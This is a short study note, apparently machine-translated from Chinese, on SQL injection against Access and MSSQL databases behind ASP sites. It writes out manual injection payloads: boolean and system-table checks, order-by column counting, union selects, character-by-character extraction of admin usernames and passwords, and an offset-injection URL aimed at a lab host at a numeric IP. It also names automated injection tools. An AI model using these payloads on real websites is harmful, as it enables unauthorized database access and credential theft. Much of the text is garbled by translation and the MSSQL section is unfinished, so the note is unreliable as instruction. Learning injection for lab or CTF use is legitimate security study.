1,access Database Introduction relational database management system, Microsoft's small database advantages: improve speed, reduce the amount of code, avoid the use of process call defects: data is too large, performance is degraded, database brush write cause problems, security not
Suffix *.mdb Open tool: Assistant, broken barrier platform: Small Cyclone Aspweb tool 2,access Database call analysis ASP Web site, (id=) parameter passing, see parameters, look query statement, using break-through analysis data code audit to see if there is a filter 3,access injection of the originalManagementFirst determine if there is an injection point ', and 1=1,and 1=2, if the previous filter out, with the subsequent judgment, or 1=1,or 1=2, and 1=23, or after the ID value plus a minus sign to determine the database type, after the id= with the following sentence to judge, Sometimes there may be no permissions and exists (SELECT * from Msysobjects) >0 (Access-specific judgment) and exists (SELECT * from sysobjects) > 0 (SQL Server specific judgment) determine what tables and fields the database has and exists (SELECT * from admin) Successful access proves that there is a Amdin table and exists (select Admin from Admin) in the Success field The DMin field determines the length of the field, order by 10 normal 11 is not normal, then the field length is 10and 1=2 Union select 1,2,3,4,5,6,7,8,9,10 (in Firefox we can automatically generate) burst in 3 and 5 words to determine the user name and password and ( Select Len (Admin) from Admin) >5 determine the length of the user name, in the same sense password we write on the corresponding number Admin,password to get the account and password to determine the password and username assciiand (select top 1 ASC (Mid (admin,1,1)) from admin >0 one by one to judge the same kind of use AH D tools the same nature 4,access injection tool Ming Boy, pangolin, ah D, Turnip head
Offset injection Resolve table name has, but no column name knows the field length, we use * Instead, delete the number, the success position, the burst of things more random
Offset injection Another way to find the login screen, review the elements, look at the login name and account, view information and field names
Instance: The site is known to be an access injection
The judging field is 12
Sqlmap ran out of the admin table, the union query is 5 and 7
can find ID, but could not find the admin and pass, obvious access injection
Find offset Point
So say 12-8=44*2=812-8=4 all have two parameters, there are four field values http://218.245.4.113:8888/web03/ca55022fa7ae5c29d179041883fe1556/index.asp?id=886 and 1=1 Union select 1,2,3,4, * FROM (admin as a inner join admin as B on a.id=b.id)Get the results, read the questions and submit answers.
Access Pants Tracking
1,mssql Database Introduction Microsoft developed a relatively large database, compared to the relatively perfect, relatively new is the SQL Server2012mssql service, port, The default is 1433service.msc view service MSSQL installation Baidu Many open the database, right-click on the left side of the database-new database Popup--Enter the name--add to determine the file suffix name lazy.mdf Delete the database, right click--task--separation--Select all--OK--in the entry drive letter Delete two file query The statement is as specific as access above can go to the Internet to find SA permissions: Database operations, file Management, command execution, registry read, System, permissions big DB permissions: File management, database operations, general user public permissions: Guest users
2,mssql Data Call Analysis
3,MSSQL Injection Statement
The following is a manual test site explosion, here will not say.
From for notes (Wiz)
Learn note five-sql access and MSSQL injections
